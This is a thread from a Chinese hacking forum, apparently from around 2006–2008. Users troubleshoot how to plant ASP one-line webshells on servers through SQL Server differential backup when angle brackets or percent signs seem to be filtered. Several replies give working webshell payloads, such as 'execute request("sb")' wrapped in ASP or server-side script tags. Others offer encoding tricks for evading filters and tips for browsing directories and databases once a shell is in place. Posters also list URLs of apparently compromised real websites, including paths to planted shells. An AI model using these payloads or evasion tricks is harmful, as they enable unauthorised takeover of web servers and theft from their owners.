Board logo

标题: [讨论]遇到差异备分过滤了<>怎么办? [打印本页]

作者: 冰绿茶    时间: 2008-7-23 08:26     标题: [讨论]遇到差异备分过滤了<>怎么办?

[讨论]遇到差异备分过滤了<>怎么办?
议题作者:凋凌玫瑰
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

我在差异备后打开的文件显示如下:

Microsoft VBScript 编译器错误 错误 '800a0408'

无效字符

/gbook/test3.asp,行 71

%Execute(request("abc"))%
^

备分的代码是:<%%25Execute(request("ah"))%%25>

好像是"<>"被过滤了

不知道这种情况咋个解决,请高手指点.

帖子79 精华12 积分3853 阅读权限100 性别男 在线时间55 小时 注册时间2006-2-26 最后登录2008-7-15 查看个人网站
查看详细资料TOP 少女暴富的隐秘(图)

守护天使
晶莹剔透§烈日灼然
作者: shirley    时间: 2008-7-23 08:26

[s:74] 我遇过

写成"%><%execute request("sb")%><%"这样来试试呢。。
帖子46 精华0 积分76 阅读权限40 来自深圳 在线时间120 小时 注册时间2006-4-25 最后登录2008-2-29 查看详细资料TOP 少女暴富的隐秘(图)

低调的沉默
晶莹剔透§烈日灼然
作者: 杰仔    时间: 2008-7-23 08:26

我的写成"%><%execute request("sb")%><%"不行!低调无罪,沉默有理

帖子2 精华0 积分9 阅读权限40 在线时间3 小时 注册时间2006-10-9 最后登录2007-6-3 查看详细资料TOP 软件项目外包

cool俊
晶莹剔透§烈日灼然
作者: PLAN2000    时间: 2008-7-23 08:26

为什么不用nbsi3.0的log备份?
getwebshell就很好用..实在要差异备份.
就把一句木马转换成16进制再插入或者加上转义字符试试.还有可以把<>换成%lt;跟%gt;。换成%lt;,%gt;我没试过..不知道行不行...
详细自已到baidu搜搜啦..呵呵.我记不太清楚了
帖子3 精华0 积分9 阅读权限40 在线时间15 小时 注册时间2005-6-14 最后登录2008-3-26 查看详细资料TOP

凋凌玫瑰
荣誉会员

作者: sam_slk    时间: 2008-7-23 08:26

nbsi3.0的log备份试了,根本就写不进去一句话,转换成十六进制也试了,不行.

帖子79 精华12 积分3853 阅读权限100 性别男 在线时间55 小时 注册时间2006-2-26 最后登录2008-7-15 查看个人网站
查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

hack520
运维管理组

作者: 网飞鸿    时间: 2008-7-23 08:26

[s:75]  实话告诉你吧,没搞. [s:75]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料TOP 少女暴富的隐秘(图)

cnhcerkf
运维管理组

作者: XIELLP    时间: 2008-7-23 08:26

同意楼上的,楼主为什么不换一个别的思路?能够back了意思是不是DBO的权限,得到了目录呢?为什么不看下别的目录有没有可以利用的东西?如果有别的目录为什么不去下层目录呢?
如果能找到管理员的一个TXT你就应该发了。珍爱生命,潜心修炼,早日成仙。
帖子374 精华2 积分3971 阅读权限150 性别男 在线时间708 小时 注册时间2006-8-27 最后登录2008-7-6 查看详细资料TOP 让女孩一夜变的更有女人味

dsaddd
作者: 晨曦的男朋友    时间: 2008-7-23 08:26

提示: 作者被禁止或删除 内容自动屏蔽
帖子2 精华0 积分-401 阅读权限0 在线时间0 小时 注册时间2006-10-9 最后登录2006-10-10 查看详细资料TOP

某牛人
晶莹剔透§烈日灼然
作者: 车大炮    时间: 2008-7-23 08:26

如果真的过滤了<的话
会提示在那个地方出错??
其实没有过滤的
自己写段代码到ASP里面
看怎么才会出现类似的错误吧。
帖子28 精华0 积分82 阅读权限40 在线时间55 小时 注册时间2006-3-2 最后登录2007-11-11 查看详细资料TOP

神無月
晶莹剔透§烈日灼然
作者: jencky    时间: 2008-7-23 08:26

要是确定是过滤<>了      估计没门了.
帖子124 精华0 积分313 阅读权限40 性别男 在线时间37 小时 注册时间2006-4-22 最后登录2008-6-9 查看详细资料TOP

凋凌玫瑰
荣誉会员

作者: 醉鞭名马    时间: 2008-7-23 08:26

引用:
这里是引用第[5 楼]的hack520于2006-10-09 22:44发表的:
[s:75]  实话告诉你吧,没搞. [s:75]
搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.

帖子79 精华12 积分3853 阅读权限100 性别男 在线时间55 小时 注册时间2006-2-26 最后登录2008-7-15 查看个人网站
查看详细资料TOP

cnhcerkf
运维管理组

作者: 高尔夫1.8t    时间: 2008-7-23 08:26

楼上的,既然得了webshell,能否把代码帖出来的?看他什么以什么方式过滤,替换或者是什么的,可能有方法,就跟那个aaspsp似的。。珍爱生命,潜心修炼,早日成仙。
帖子374 精华2 积分3971 阅读权限150 性别男 在线时间708 小时 注册时间2006-8-27 最后登录2008-7-6 查看详细资料TOP

ring04h
团队执行官

作者: ken2    时间: 2008-7-23 08:26

没可能过滤 <>  过滤了<>,他网站还能运行吗?  估计是%号的原因.
  上面都有提示了 % 无效字符.

  你试下这个  <script language=VBScript runat=server>execute request("sb")</Script>
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1096 小时 注册时间2007-10-23 最后登录2008-7-21 查看详细资料TOP

hack520
运维管理组

作者: Asker    时间: 2008-7-23 08:26

引用:
这里是引用第[10 楼]的凋凌玫瑰于2006-10-10 10:22发表的:




搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.
偶滴意思是说,过滤了<>,要是通过bluk,确实木搞。当然咯,搞站大法也不是就这几下吧~~ [s:75]  [s:75]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料TOP

走在云上
晶莹剔透§烈日灼然
作者: s369    时间: 2008-7-23 08:26

字符转换不行的话就不知道了哈哈我是菜鸟我怕谁
帖子13 精华0 积分15 阅读权限40 在线时间17 小时 注册时间2006-8-9 最后登录2008-6-4 查看详细资料TOP

菜菜阿哲
晶莹剔透§烈日灼然
作者: biaofbi    时间: 2008-7-23 08:26

我杂遇见的比他还郁闷 我差异悲愤的整个马都消失了 猪三哥帮给看看贝

http://www.czfdcw.com.cn/yejie/text/articleshow.asp?id=14039

e:\czfdcw.com.cn\

悲愤出来的就没俺的一句话
帖子16 精华0 积分46 阅读权限40 在线时间27 小时 注册时间2006-10-5 最后登录2007-7-19 查看详细资料TOP

平安年间
晶莹剔透§烈日灼然
作者: 大胃仔    时间: 2008-7-23 08:26

前后加%><%execute request("#")%><%应是可行的,不过备份后可能又会出新的错误

什么什么无效字符类的提示

如果不行,可以试下lake2的unicode字符并非高手

帖子62 精华2 积分245 阅读权限40 性别男 在线时间11 小时 注册时间2006-10-3 最后登录2008-5-13 查看个人网站
查看详细资料TOP

akens
晶莹剔透§烈日灼然
作者: dickson    时间: 2008-7-23 08:26

楼上的,话怎么说一半就说了呢
UNICODE具体怎么实现
帖子22 精华0 积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21 查看详细资料TOP

akens
晶莹剔透§烈日灼然
作者: jazz    时间: 2008-7-23 08:26

我提交一句话出现这个问题
Active Server Pages 错误 &#39;ASP 0141&#39;

Page 命令重复

/ken.asp,行 714

@ 命令只能在 Active Server Page 中使用一次。
谁来解释下呢
帖子22 精华0 积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21 查看详细资料TOP

trace
晶莹剔透§烈日灼然
作者: 豆粒    时间: 2008-7-23 08:26

引用:
这里是引用第[18 楼]的akens于2006-10-23 15:14发表的:
我提交一句话出现这个问题
Active Server Pages 错误 &#39;ASP 0141&#39;

Page 命令重复

.......
估计他asp代码首句是
<%@language=VBScript%>
而你又指定了脚本语言一次.
帖子111 精华0 积分304 阅读权限40 性别男 在线时间137 小时 注册时间2006-4-3 最后登录2008-7-4 查看详细资料TOP

风云逸剑
晶莹剔透§烈日灼然
作者: jerryho    时间: 2008-7-23 08:26

郁闷呀  

我还遇上不能SA不能备份 [s:34]
帖子66 精华0 积分212 阅读权限40 性别男 在线时间181 小时 注册时间2006-4-12 最后登录2008-7-18 查看详细资料TOP

xunix
晶莹剔透§烈日灼然
作者: 杨羽    时间: 2008-7-23 08:26

我遇到的 和你差不多
我的还多一样,就是把我的所有的语句读给写三次
我传个文本上去居然也是三次
我这个的原因估计是我把IIS配置里面的那个防止错误选项勾上了
现在上网不方便也没有深究。
有条件的朋友那个2003实验一下做人还是脚踏实地的好

帖子4 精华0 积分13 阅读权限40 性别男 在线时间11 小时 注册时间2006-5-29 最后登录2008-6-3 查看详细资料TOP

追寻
荣誉会员

作者: 德军1941    时间: 2008-7-23 08:26

我一般备份不成功的话就会去尝试列目录找找网站的数据库。然后XXXX

帖子561 精华2 积分4271 阅读权限100 性别男 在线时间525 小时 注册时间2006-9-23 最后登录2008-7-22 查看个人网站
查看详细资料TOP

cnxhack
晶莹剔透§烈日灼然
作者: 狗狗汪汪    时间: 2008-7-23 08:26

[s:75]  http://www.czfdcw.com.cn/blog/net.asp

见多了..  好搞.
http://www.czfdcw.com.cn/blog/321.asp
帖子17 精华0 积分53 阅读权限40 性别男 在线时间6 小时 注册时间2006-5-3 最后登录2008-6-26 查看详细资料TOP

可酷可乐
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2